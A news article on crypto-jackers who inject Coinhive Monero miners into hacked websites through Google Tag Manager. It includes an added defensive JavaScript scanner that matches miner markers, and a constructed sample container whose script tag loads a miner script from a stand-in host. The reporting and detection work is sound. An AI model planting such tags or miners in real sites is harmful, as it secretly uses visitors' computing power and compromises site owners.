Crypto-jackers enlist Google Tag Manager to smuggle alt-coin miners

Ad giant has malware detection in its script-hosting service... but Coinhive isn't flagged

Crypto-jackers using Coinhive code to secretly mine Monero via computing power supplied by the unsuspecting have found Google Tag Manager to be a convenient means of distribution.

Security researcher Troy Mursch told The Register that he recently found Coinhive's free-to-use JavaScript running on the Globovisión website – Globovisión being a 24-hour telly station for Venezuela and Latin America.

The code was invisibly spawned, he said, "from the embedded Google Tag Manager script gtm.js?id=GTM-KCDXG2D," which invoked cryptonight.wasm, a WebAssembly form of Coinhive's JavaScript mining code.

Google Tag Manager allows marketers, or anyone else with a website, to create code – dubbed a tag – that can be placed in webpages to dynamically inject JavaScript snippets rather than using hardcoded JavaScript in those files.

Google's service, handily enough, provides more control and flexibility than static code delivery.

Because the code gets served by Google Tag Manager, it's not present in the source files on a web server. The JavaScript file and appended parameter gtm.js?id=GTM-KCDXG2D don't say anything about the function of the code invoked. Essentially, miscreants are hacking websites and quietly adding Google-hosted tags that contain the malicious coin-mining code, thus obfuscating the source of the scripts.
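For site owners, the practical check is to list which Tag Manager containers a rendered page references, compare them with the containers the owner actually created, and scan each container's JavaScript for miner markers. The following sketch is an added example, not code from the article or from Google: the function names, the allowlisted ID GTM-EXAMPLE1, the miner.invalid host and both sample container bodies are constructed for illustration, and the only markers used are the two strings the article names.

```javascript
// Added example (not from the article): audit the GTM containers a page
// references and scan container JavaScript for the markers the article names.

// Markers taken from the article text; a production scanner needs a maintained list.
const MINER_MARKERS = ['coinhive', 'cryptonight'];

// Collect every container ID in the HTML, whether it appears in a gtm.js URL,
// the noscript iframe, or the inline bootstrap snippet.
function findGtmContainers(html) {
  return [...new Set(html.match(/\bGTM-[A-Z0-9]{4,}\b/g) || [])];
}

// Decode \xNN and \uNNNN escapes so embedded HTML is scanned in decoded form.
function decodeEscapes(js) {
  return js
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return the markers found in one container's JavaScript.
function scanContainer(js) {
  const text = decodeEscapes(js).toLowerCase();
  return MINER_MARKERS.filter((m) => text.includes(m));
}

// For each container on the page: is it one the owner created, and what did it match?
function auditPage(html, allowedIds, containerBodies) {
  return findGtmContainers(html).map((id) => ({
    id,
    expected: allowedIds.includes(id),
    markers: scanContainer(containerBodies[id] || ''),
  }));
}

// Constructed sample data (not captured traffic). GTM-EXAMPLE1 stands in for
// the owner's own container; GTM-KCDXG2D is the ID quoted in the article.
const SAMPLE_HTML = `
<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE1"></script>
<script>(function(w,d,s,l,i){/* bootstrap */})(window,document,'script','dataLayer','GTM-KCDXG2D');</script>`;
const SAMPLE_BODIES = {
  'GTM-EXAMPLE1': 'var data={"tags":[{"function":"__ua"}]};',
  'GTM-KCDXG2D': 'var data={"tags":[{"html":"\\x3cscript src=\\"https://miner.invalid/lib/coinhive.min.js\\"\\x3e"}]};',
};

console.log(auditPage(SAMPLE_HTML, ['GTM-EXAMPLE1'], SAMPLE_BODIES));
```

A container that is not on the owner's list is a finding in its own right, whatever the marker scan returns, because it means the page was modified.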

Mursch said the Globovisión mining code was removed within an hour of discovery, and it's not clear how it got there. He found the Monero-crafting JS, he said, while reviewing another crypto-jacking incident with a Brazilian singer's website.

Google did not immediately respond to a request for comment.

A month ago, when The Register reported that Google short URLs were being co-opted for Monero, there were about 113,000 instances of cryptonight mining. Presently, there are about 180,000.

The Chocolate Factory's Tag Manager Terms of Service prohibits misuse, and the ad distribution biz has systems in place to look for malware in tags and prevent them from firing when found.

"In most cases, affected users are unaware that there are tags serving malware from their containers," the web giant explained on its website. "Usually through no fault of your own, a network provider becomes malware infected when they install 3rd party libraries or templates onto their websites, and subsequently transmit that malware to your site via the custom HTML tag that you published onto your website via Tag Manager."

That being the case, it appears that Google either cannot detect Coinhive code through Tag Manager or it doesn't consider it to be malicious. Most ad blockers, as well as antivirus tools, kill Coinhive's code on sight these days.

Coinhive's development team did not respond to a request for comment.

Noting that crypto-jacking tops Malwarebytes' list of security ills likely to be visited upon businesses and consumers in 2018, Mursch said: "We should expect this trend to continue." ®
